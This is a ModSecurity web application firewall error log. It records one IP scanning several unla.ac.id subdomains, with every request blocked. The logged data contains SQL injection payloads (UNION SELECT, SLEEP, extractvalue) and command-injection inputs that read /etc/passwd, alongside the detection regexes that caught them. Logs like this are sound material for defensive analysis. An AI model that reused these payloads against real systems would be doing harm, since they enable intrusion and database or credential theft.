[Tue Aug 29 11:32:23.335835 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANsAbIAAAAD"]
[Tue Aug 29 11:32:23.346910 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAN9sV8AAAAJ"]
[Tue Aug 29 11:32:23.352936 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1018Co-f0AAARD1N0AAAAH"]
[Tue Aug 29 11:32:23.353441 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANwNzQAAAAb"]
[Tue Aug 29 11:32:23.355980 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQUIEUAAAA2"]
[Tue Aug 29 11:32:24.325730 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO102MCo-f0AAAN9sWIAAAAJ"]
[Tue Aug 29 11:32:24.327385 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO102MCo-f0AAAQnF-gAAAAF"]
[Tue Aug 29 11:32:25.317272 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAARD1OMAAAAH"]
[Tue Aug 29 11:32:25.319830 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAN9sWQAAAAJ"]
[Tue Aug 29 11:32:25.351536 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPDoFYAAAAP"]
[Tue Aug 29 11:32:25.360493 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAANwNzsAAAAb"]
[Tue Aug 29 11:32:25.369962 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQUIEwAAAA2"]
[Tue Aug 29 11:32:25.370872 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPDoFcAAAAP"]
[Tue Aug 29 11:32:25.375856 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPxBYkAAAAS"]
[Tue Aug 29 11:32:25.376058 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAARD1OUAAAAH"]
[Tue Aug 29 11:32:25.379825 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAARA7ZcAAAAA"]
[Tue Aug 29 11:32:25.390979 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQUIE0AAAA2"]
[Tue Aug 29 11:32:26.697085 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102sCo-f0AAAQUIFMAAAA2"]
[Tue Aug 29 11:32:26.856650 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102sCo-f0AAANwNz4AAAAb"]
[Tue Aug 29 11:32:27.511898 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPDoF8AAAAP"]
[Tue Aug 29 11:32:27.568815 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARGwccAAAAL"]
[Tue Aug 29 11:32:27.573269 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPDoGIAAAAP"]
[Tue Aug 29 11:32:27.592213 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPiBsgAAAAB"]
[Tue Aug 29 11:32:27.991253 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARIwIMAAAAO"]
[Tue Aug 29 11:32:28.379374 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAARH7HQAAAAM"]
[Tue Aug 29 11:32:28.384407 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANwN0kAAAAb"]
[Tue Aug 29 11:32:28.449088 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANwN0wAAAAb"]
[Tue Aug 29 11:32:28.476016 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAPDoGoAAAAP"]
[Tue Aug 29 11:32:30.303200 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQUIGIAAAA2"]
[Tue Aug 29 11:32:30.306799 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARA7ZkAAAAA"]
[Tue Aug 29 11:32:30.306827 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAANwN08AAAAb"]
